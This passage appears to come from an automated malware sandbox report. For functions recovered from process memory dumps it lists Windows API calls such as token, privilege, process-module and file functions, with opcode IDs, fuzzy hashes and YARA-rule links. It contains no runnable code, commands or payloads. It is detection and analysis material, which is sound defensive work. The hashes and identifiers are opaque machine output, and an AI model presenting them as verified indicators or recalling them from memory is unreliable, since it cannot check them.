                                                                                            • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2177031252.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EventRegisterSource
                                                                                            • String ID:
                                                                                            • API String ID: 1693822063-0
                                                                                            • Opcode ID: 61f84f891c2b251c4bfc6d4b5c40392a7b39758d3347b8ea362dcff27aefc0f5
                                                                                            • Instruction ID: 2672c94dbdfdda0c5c10976e3ef1675e1e4bd4a2520de6922834237c46b3ee33
                                                                                            • Opcode Fuzzy Hash: 61f84f891c2b251c4bfc6d4b5c40392a7b39758d3347b8ea362dcff27aefc0f5
                                                                                            • Instruction Fuzzy Hash: 6E3195B1509380AFE712CB25DC45F96BFE8DF06214F0884AAE984CF293D775A905C771
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01DCBD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTokenInformation.KERNELBASE(?,00000E9C,125E3374,00000000,00000000,00000000,00000000), ref: 01DCBDBC
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170145326.0000000001DCA000.00000040.00000001.sdmp, Offset: 01DCA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationToken
                                                                                            • String ID:
                                                                                            • API String ID: 4114910276-0
                                                                                            • Opcode ID: 15bc05b5e6577c0b0db24e87f260b552ab713ffa519ee0a355f84bf6fa1fb9d0
                                                                                            • Instruction ID: 40f17d062f0985d772702618829f60dc6e7196993112992777ec1a47e484bcc5
                                                                                            • Opcode Fuzzy Hash: 15bc05b5e6577c0b0db24e87f260b552ab713ffa519ee0a355f84bf6fa1fb9d0
                                                                                            • Instruction Fuzzy Hash: A031B172009380AFE722CB60DC45F96BFB8EF06210F08859BE985CB193D224A908C7A1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01DCAF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32EnumProcessModules.KERNEL32(?,00000E9C,125E3374,00000000,00000000,00000000,00000000), ref: 01DCAFBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170145326.0000000001DCA000.00000040.00000001.sdmp, Offset: 01DCA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumModulesProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1082081703-0
                                                                                            • Opcode ID: 1ef8469a221fbda8f4d30fc225a6ed6f75b83a5b68336fb92be24ffdc390f183
                                                                                            • Instruction ID: 7d10cf38e61ef19edd79c8bdc824a957c574250c53cacf0c516d8d1051f95c3b
                                                                                            • Opcode Fuzzy Hash: 1ef8469a221fbda8f4d30fc225a6ed6f75b83a5b68336fb92be24ffdc390f183
                                                                                            • Instruction Fuzzy Hash: E621E4B2509380AFE712CF20DC45B96BFB8EF06320F0884DBE984DB193D225A909C771
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2177031252.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationVolume
                                                                                            • String ID:
                                                                                            • API String ID: 2039140958-0
                                                                                            • Opcode ID: 2930989b1c4e0985aa2a99386e14d9f32cdeca63b9d5bd32e30cf8e50ef7ed88
                                                                                            • Instruction ID: e177bd619f674537d066f4cc1d77d23c48d062a7a13600e11878afa4f3aaedb7
                                                                                            • Opcode Fuzzy Hash: 2930989b1c4e0985aa2a99386e14d9f32cdeca63b9d5bd32e30cf8e50ef7ed88
                                                                                            • Instruction Fuzzy Hash: 8D31737550E3C06FD3138B358C55B66BFB4AF47610F1A81DBD884CF1A3D629A909C7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01DCB01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32GetModuleInformation.KERNEL32(?,00000E9C,125E3374,00000000,00000000,00000000,00000000), ref: 01DCB0AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170145326.0000000001DCA000.00000040.00000001.sdmp, Offset: 01DCA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationModule
                                                                                            • String ID:
                                                                                            • API String ID: 3425974696-0
                                                                                            • Opcode ID: 2cfe45ea21a792e8e62f65b4f9905d2a606063a1a1accd47895a71e9f19ab877
                                                                                            • Instruction ID: 59f9891453234c9b6578280bbe6ec155e0790d2738007da5a856ae97e62f279e
                                                                                            • Opcode Fuzzy Hash: 2cfe45ea21a792e8e62f65b4f9905d2a606063a1a1accd47895a71e9f19ab877
                                                                                            • Instruction Fuzzy Hash: F7219171505380AFE722CB15CC45FA6FFA8EF46660F08849BF945DB152D664E908CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileType.KERNELBASE(?,00000E9C,125E3374,00000000,00000000,00000000,00000000), ref: 02770819
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2177031252.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileType
                                                                                            • String ID:
                                                                                            • API String ID: 3081899298-0
                                                                                            • Opcode ID: 40b4b02a223a89c3a15304284eca29e59abc6ab3331c97add4fcab31f12b4cde
                                                                                            • Instruction ID: d25a6e3056bd65cc064d5770422c6566abbdb47652582906b75b8bb7f0ccfc59
                                                                                            • Opcode Fuzzy Hash: 40b4b02a223a89c3a15304284eca29e59abc6ab3331c97add4fcab31f12b4cde
                                                                                            • Instruction Fuzzy Hash: 4A21FCB6408780AFE712CB159C45FA3BFA8EF46724F0981DBF9858B193D224A905C7B1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01DCA1A8, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01DCA23E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170145326.0000000001DCA000.00000040.00000001.sdmp, Offset: 01DCA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleCtrlHandler
                                                                                            • String ID:
                                                                                            • API String ID: 1513847179-0
                                                                                            • Opcode ID: b9ebf68b7f22ef42d07e052e3075cd49f2542552ea30a4877d1b8e1d54c16372
                                                                                            • Instruction ID: 7db6becd5333079b9bc31248285cf7ceaaea424962371225f4aae470e24b4f06
                                                                                            • Opcode Fuzzy Hash: b9ebf68b7f22ef42d07e052e3075cd49f2542552ea30a4877d1b8e1d54c16372
                                                                                            • Instruction Fuzzy Hash: 1121C77144D3C06FD312CB258C55B66FFB4EF47620F0981DBD8848F593D229A919C7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2177031252.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FolderPath
                                                                                            • String ID:
                                                                                            • API String ID: 1514166925-0
                                                                                            • Opcode ID: 218731697f335efd054c81e2512a25e271f3dff409b49fcc37326dd16217b277
                                                                                            • Instruction ID: d782a4e88695025df60447029a63a3fc27ef00f884a1ea650ebbf09f957a2b5d
                                                                                            • Opcode Fuzzy Hash: 218731697f335efd054c81e2512a25e271f3dff409b49fcc37326dd16217b277
                                                                                            • Instruction Fuzzy Hash: D521717640E3C0AFD3128B358C55B62BFB4EF47610F1A81CBD8848F693D225A919C7B2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027706AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2177031252.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: fdc7fb31067b1bd7e2a2981cd073b9a43037f01e21eb6eae658dce07f39e11c7
                                                                                            • Instruction ID: fa80ae2bdd34b4017a074171bd0b6ff59ead6a1b856f351c84c1c7160e82efd5
                                                                                            • Opcode Fuzzy Hash: fdc7fb31067b1bd7e2a2981cd073b9a43037f01e21eb6eae658dce07f39e11c7
                                                                                            • Instruction Fuzzy Hash: 44219071500704EFEB21DF65CC85F66FBE8EF08650F04846AE9499B292D771E904CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(?,00000E9C,125E3374,00000000,00000000,00000000,00000000), ref: 027708E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2177031252.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 73d8a8510ef7393010dd6f6fcc1913d29bcec5891c3345162bc0788a343c925e
                                                                                            • Instruction ID: bdfed00dca547734ed17ee3689a279072a9c5a3e7901727382c196fd5083991a
                                                                                            • Opcode Fuzzy Hash: 73d8a8510ef7393010dd6f6fcc1913d29bcec5891c3345162bc0788a343c925e
                                                                                            • Instruction Fuzzy Hash: 07219272409380AFE722CF61DC45F96FFB8EF46314F09859BE9449B153C265A909CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01DCA8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01DCA94A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170145326.0000000001DCA000.00000040.00000001.sdmp, Offset: 01DCA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguagesPreferredThread
                                                                                            • String ID:
                                                                                            • API String ID: 842807343-0
                                                                                            • Opcode ID: a57d9104da30109fed0808d82f6d411fcdbd96c565d276a79341f99da7f2be99
                                                                                            • Instruction ID: f7a7efbef3e0aeead6c2ca9c824799f2a0222bcd743e69f8714af42a0944aabc
                                                                                            • Opcode Fuzzy Hash: a57d9104da30109fed0808d82f6d411fcdbd96c565d276a79341f99da7f2be99
                                                                                            • Instruction Fuzzy Hash: 14219575409780AFD3138B259C51B62BFB4EF87610F0981DBE8848B653D224A919C7B2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2177031252.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EventRegisterSource
                                                                                            • String ID:
                                                                                            • API String ID: 1693822063-0
                                                                                            • Opcode ID: 951c996ecd864d307e98102a3d143674a9582af439ebc6b4fc16720aada787be
                                                                                            • Instruction ID: 374754f1412302494eaa26b8225264d6677bd2102b017f111376b76647e04728
                                                                                            • Opcode Fuzzy Hash: 951c996ecd864d307e98102a3d143674a9582af439ebc6b4fc16720aada787be
                                                                                            • Instruction Fuzzy Hash: 26218E71600340AFFB21DF65DC85BA6FBD8EF05654F04846AE948DB282D775F904CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01DCBD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTokenInformation.KERNELBASE(?,00000E9C,125E3374,00000000,00000000,00000000,00000000), ref: 01DCBDBC
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170145326.0000000001DCA000.00000040.00000001.sdmp, Offset: 01DCA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationToken
                                                                                            • String ID:
                                                                                            • API String ID: 4114910276-0
                                                                                            • Opcode ID: 5b03d9cd180701d6f1dde87f41ace3050b1586d167fa8ec5c09927dc19e3e391
                                                                                            • Instruction ID: 8cf8fbcfe7ab58a891f5b8bb7d311be21cfd331c9dbd9727e2716bd08b0a6b0b
                                                                                            • Opcode Fuzzy Hash: 5b03d9cd180701d6f1dde87f41ace3050b1586d167fa8ec5c09927dc19e3e391
                                                                                            • Instruction Fuzzy Hash: 2E119D72500304EFEB21CF65DC85FAAFBACEF04760F04896AF9459B141D670E9448BB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0277137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2177031252.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite
                                                                                            • String ID:
                                                                                            • API String ID: 2657657451-0
                                                                                            • Opcode ID: d1c5c34c7422ccc3533c2e0023b644dab25acc6604d9213fc067cb257fb397c9
                                                                                            • Instruction ID: 7a778f4077b563d50b3544fc24db3ba079b338527bc9f5155c2066781741524f
                                                                                            • Opcode Fuzzy Hash: d1c5c34c7422ccc3533c2e0023b644dab25acc6604d9213fc067cb257fb397c9
                                                                                            • Instruction Fuzzy Hash: F22192725043809FEB21CF25DC45B96FFB4EF06220F0984AAED858B562D235A448DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2177031252.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DriveType
                                                                                            • String ID:
                                                                                            • API String ID: 338552980-0
                                                                                            • Opcode ID: 234109eca374e146cd64685ce85b62be09fa8bba38fc0161ff3e269b907b903d
                                                                                            • Instruction ID: 78d45dc2163b41c496616914212e839724a137711314fdad295e90e9ef2be6bb
                                                                                            • Opcode Fuzzy Hash: 234109eca374e146cd64685ce85b62be09fa8bba38fc0161ff3e269b907b903d
                                                                                            • Instruction Fuzzy Hash: 0F216F7150D3C09FDB12CB25DC55B92BFB4AF07214F0D84DAE888CF253D2659908C762
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01DCB04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32GetModuleInformation.KERNEL32(?,00000E9C,125E3374,00000000,00000000,00000000,00000000), ref: 01DCB0AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170145326.0000000001DCA000.00000040.00000001.sdmp, Offset: 01DCA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationModule
                                                                                            • String ID:
                                                                                            • API String ID: 3425974696-0
                                                                                            • Opcode ID: 146110a5c5250f950dc9171121b6585257086c580c3ea51dd3a8ec468c3a7261
                                                                                            • Instruction ID: 477954ee8a0c8eb4abd8316f2e950bae68c677918fd122a876a8b7f39ef61c73
                                                                                            • Opcode Fuzzy Hash: 146110a5c5250f950dc9171121b6585257086c580c3ea51dd3a8ec468c3a7261
                                                                                            • Instruction Fuzzy Hash: 5F118171600700EFFB21CF19DC86FA6FBA8EF45660F14896BED45CB241D674E9048A71
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01DCBABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleScreenBufferInfo.KERNEL32 ref: 01DCBB2F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170145326.0000000001DCA000.00000040.00000001.sdmp, Offset: 01DCA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: BufferConsoleInfoScreen
                                                                                            • String ID:
                                                                                            • API String ID: 3437242342-0
                                                                                            • Opcode ID: d6f5f2ae6bdc25e677aabcaa93f7e31ea8acd90ba8595e515216ce0f89356d90
                                                                                            • Instruction ID: dc7f2a637f24e632016eec28378ae0f56fe7cb07d986005ebb3d7d2a5a02d6fb
                                                                                            • Opcode Fuzzy Hash: d6f5f2ae6bdc25e677aabcaa93f7e31ea8acd90ba8595e515216ce0f89356d90
                                                                                            • Instruction Fuzzy Hash: CB21A1725093C09FEB128B65DC55A92BFB4EF07220F0984DBDD858F263D224A908DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01DCAAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01DCAB1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170145326.0000000001DCA000.00000040.00000001.sdmp, Offset: 01DCA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: 5b91fff3f74768a04ffc14216b31c0b26f2f14a53a4c8c002d41bc3263288708
                                                                                            • Instruction ID: 0247cc6e81f98b30c127902ffdbc460f9c23df66ab6d300c5253642bd49713ca
                                                                                            • Opcode Fuzzy Hash: 5b91fff3f74768a04ffc14216b31c0b26f2f14a53a4c8c002d41bc3263288708
                                                                                            • Instruction Fuzzy Hash: 112175716053849FE722CF29DC44B52FFA8EF56610F08849EED45CB253E265E404C761
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027710D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2177031252.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguageThread
                                                                                            • String ID:
                                                                                            • API String ID: 243849632-0
                                                                                            • Opcode ID: 40c398b456655fe0dbbcf8d8e6c2b8309fcd6783fab60939f54ef4b9d654cf92
                                                                                            • Instruction ID: c20bd91c729ff02751bb556aaca1bb312aab9b4a2bbecc4be2920d796a4bdafa
                                                                                            • Opcode Fuzzy Hash: 40c398b456655fe0dbbcf8d8e6c2b8309fcd6783fab60939f54ef4b9d654cf92
                                                                                            • Instruction Fuzzy Hash: 12216D6140D3C4AFE7138B259C54A62BFB4EF57624F0980DBD8858F2A3D6696808D772
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01DCAF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32EnumProcessModules.KERNEL32(?,00000E9C,125E3374,00000000,00000000,00000000,00000000), ref: 01DCAFBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170145326.0000000001DCA000.00000040.00000001.sdmp, Offset: 01DCA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumModulesProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1082081703-0
                                                                                            • Opcode ID: 478b747a5c8079e99bfc87aa0638fe9f253aad5c52f29e1d121117f35ca9c692
                                                                                            • Instruction ID: 5540c78e7238c3acef7796af4ba011a52cf2d85632b379578779741ab13e0873
                                                                                            • Opcode Fuzzy Hash: 478b747a5c8079e99bfc87aa0638fe9f253aad5c52f29e1d121117f35ca9c692
                                                                                            • Instruction Fuzzy Hash: 2411BF72500305EFEB21DF55DC85BA6FBA8EF44720F14886AF9498B281D670E9048BB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02770886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(?,00000E9C,125E3374,00000000,00000000,00000000,00000000), ref: 027708E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2177031252.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 073a9f47e9c2921f8df873a44140d415928e037b6d232c55ae472dce107014f4
                                                                                            • Instruction ID: 5c48b7e78138435cf968ddaa58906713e04d9aa986b3aab453f56c953c8ec552
                                                                                            • Opcode Fuzzy Hash: 073a9f47e9c2921f8df873a44140d415928e037b6d232c55ae472dce107014f4
                                                                                            • Instruction Fuzzy Hash: CC11E072400300EFFB21CF51DC85FA6FBE8EF18720F04856AED499A241C671A904CBB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01DCBA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01DCBA7E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170145326.0000000001DCA000.00000040.00000001.sdmp, Offset: 01DCA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 1c729969f71851ca058aa768f4164c16c1c2bcf9d094a08c877e6f37aad0b157
                                                                                            • Instruction ID: 9de160d4455abcba1665bdac789e66aecf9bcf56168e2c191898f0a4f6753f6e
                                                                                            • Opcode Fuzzy Hash: 1c729969f71851ca058aa768f4164c16c1c2bcf9d094a08c877e6f37aad0b157
                                                                                            • Instruction Fuzzy Hash: F2118C72504380AFDB22CF65CC85A52FFF4EF09250F08889EE9898B662D275E418CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027712D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2177031252.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AttributeConsoleText
                                                                                            • String ID:
                                                                                            • API String ID: 646522457-0
                                                                                            • Opcode ID: 505e9e6ba434c729cc9787485b65e2e1fa3e3b34cf185e9b013c2ac30337ed83
                                                                                            • Instruction ID: 4ab1a1ea8f236790a0563e575afacf35dc5320ad616b7ae7fa6cc491fa4e2182
                                                                                            • Opcode Fuzzy Hash: 505e9e6ba434c729cc9787485b65e2e1fa3e3b34cf185e9b013c2ac30337ed83
                                                                                            • Instruction Fuzzy Hash: BB1191725093849FDB118F25DC85B96FFA4EF46220F0984EEED498B252D275A808CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01DCA33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170145326.0000000001DCA000.00000040.00000001.sdmp, Offset: 01DCA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: Flags
                                                                                            • String ID:
                                                                                            • API String ID: 3401871038-0
                                                                                            • Opcode ID: c1b32ea243bdef91f359ea19a920a96b17d00b6a99f515a768d1961228accb4e
                                                                                            • Instruction ID: 7edb10aac5c6ad1c6290901c7ddee3131af1d1c938a2080a7b81462c28d8b465
                                                                                            • Opcode Fuzzy Hash: c1b32ea243bdef91f359ea19a920a96b17d00b6a99f515a768d1961228accb4e
                                                                                            • Instruction Fuzzy Hash: 64118F715093C49FEB128B25DC54AA2FFB4DF47614F0884CBEDC54F253D265A808DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027705E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2177031252.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileUnmapView
                                                                                            • String ID:
                                                                                            • API String ID: 2564024751-0
                                                                                            • Opcode ID: 0b0badb3656f283e545f18b22c16ae4daf65b97eea4320757868ec0572c54b66
                                                                                            • Instruction ID: aafe9f0a2e418ee51496b085bf7610ad0d0e1ae59c9c41f323ab23d909eb717c
                                                                                            • Opcode Fuzzy Hash: 0b0badb3656f283e545f18b22c16ae4daf65b97eea4320757868ec0572c54b66
                                                                                            • Instruction Fuzzy Hash: 9611E5765093C09FDB128B25DC95B52FFB4DF47224F0880DBED858B663D275A908CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0277092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2177031252.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 31276548-0
                                                                                            • Opcode ID: cc1b9df43e90d0d8dc730e023637f812fb6df0a0be2ea437f5970e35fca999c4
                                                                                            • Instruction ID: 8a7c8eedf9c87153a391c121ba3a2f243d2d09fb83e50d3f7881c1ce9c1af52b
                                                                                            • Opcode Fuzzy Hash: cc1b9df43e90d0d8dc730e023637f812fb6df0a0be2ea437f5970e35fca999c4
                                                                                            • Instruction Fuzzy Hash: 4E11BF714093C09FEB12CB25DC55B92FFB4EF07324F0980DADD844B263D265A908CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01DCAAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01DCAB1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170145326.0000000001DCA000.00000040.00000001.sdmp, Offset: 01DCA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: a667e9c135d34b737a5f76859a1fc23f1c237ba6c1373a819c2aabb717896e84
                                                                                            • Instruction ID: f92bfb605c4224361c13fbab8e11495f93977e6e3f9c3bb969b0a6e0f918f796
                                                                                            • Opcode Fuzzy Hash: a667e9c135d34b737a5f76859a1fc23f1c237ba6c1373a819c2aabb717896e84
                                                                                            • Instruction Fuzzy Hash: B81165B26003059FEB20DF69DC85B56FBD9EF14621F08C86EDD49CB642E674E404CA71
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01DCAA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleOutputCP.KERNEL32 ref: 01DCAA71
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001E.00000002.2170145326.0000000001DCA000.00000040.00000001.sdmp, Offset: 01DCA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleOutput
                                                                                            • String ID:
                                                                                            • API String ID: 3985236979-0
                                                                                            • Opcode ID: 3ef2308e7004a638b01aa6b0327e891bdd3444799fba4dd30c4e44bf659787ef
                                                                                            • Instruction ID: 58af2e6fc26cf264c248b7cb7d897f4a1459dc5515b4c403bcd95cf309377d02
                                                                                            • Opcode Fuzzy Hash: 3ef2308e7004a638b01aa6b0327e891bdd3444799fba4dd30c4e44bf659787ef
                                                                                            • Instruction Fuzzy Hash: 6411E37640D7C49FE7128B25DC85B92BFB0EF07220F0A80DBDD858F163D268A909C762
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027707C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
